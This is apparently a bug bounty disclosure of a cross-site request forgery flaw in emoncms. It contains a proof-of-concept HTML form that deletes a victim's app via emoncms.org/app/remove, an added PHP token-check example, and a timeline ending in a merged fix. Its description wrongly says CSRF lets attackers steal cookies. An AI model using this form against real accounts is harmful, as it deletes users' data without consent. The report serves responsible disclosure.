Cross-Site Request Forgery (CSRF) in emoncms/emoncms

Valid

Reported on

Jul 15th 2021


✍️ Description

In a CSRF attack, if your users go to an attacker's website and click the malicious link, then they are able to steal users' cookies, submit unwanted data, ....

🕵️‍♂️ Proof of Concept

1. You log in to your account.
2. You make a file containing the following HTML.
3. Open the HTML file (as victim site).
4. The app named "My Electric" is going to be deleted after clicking "Submit request".

// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://emoncms.org/app/remove">
<input type="hidden" name="name" value="My&#32;Electric" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


💥 Impact

The attacker can delete any app in the victim user's account.

Fix

You can set cookies on a custom header. This is the fastest way that you can protect your users.
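
One way to guard a state-changing route like the /app/remove request in the PoC, shown as an added example (not emoncms code and not the merged fix). It assumes a session-bound token sent in a hypothetical X-CSRF-Token request header, which a cross-site HTML form cannot set; the function names are also hypothetical.

```php
<?php
// Added example: CSRF guard for state-changing routes such as /app/remove.
// csrf_issue_token, csrf_check and X-CSRF-Token are hypothetical names,
// not emoncms code.

// Create the per-session token once and return it for embedding in pages.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Returns null when the request may proceed, otherwise the refusal reason.
function csrf_check(string $method, array $headers, array $session): ?string
{
    // The PoC form has no method attribute, so the browser sends a GET.
    if (strtoupper($method) !== 'POST') {
        return 'state-changing routes accept POST only';
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $headers['X-CSRF-Token'] ?? '';
    if (!is_string($supplied) || $expected === '' || $supplied === '') {
        return 'missing CSRF token';
    }
    // hash_equals compares the two strings in constant time.
    if (!hash_equals($expected, $supplied)) {
        return 'CSRF token mismatch';
    }
    return null;
}

// Constructed sample requests (not real traffic).
$session = [];
$token = csrf_issue_token($session);
$cases = [
    'PoC-style GET from another site' => ['GET', []],
    'cross-site POST, no token'       => ['POST', []],
    'cross-site POST, guessed token'  => ['POST', ['X-CSRF-Token' => str_repeat('0', 64)]],
    'same-site POST with token'       => ['POST', ['X-CSRF-Token' => $token]],
];
foreach ($cases as $label => [$method, $headers]) {
    $reason = csrf_check($method, $headers, $session);
    printf("%-32s %s\n", $label, $reason === null ? 'allowed' : "rejected: $reason");
}
```

In a real PHP handler the method would come from $_SERVER['REQUEST_METHOD'] and the header value from $_SERVER['HTTP_X_CSRF_TOKEN'], with the check run before the route performs the deletion.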


amammad modified the report
a year ago
We have contacted a member of the emoncms team and are waiting to hear back a year ago
emoncms/emoncms maintainer validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
emoncms/emoncms maintainer
a year ago

Thanks amammad!

emoncms/emoncms maintainer confirmed that a fix has been merged on ca1f5c a year ago
The fix bounty has been dropped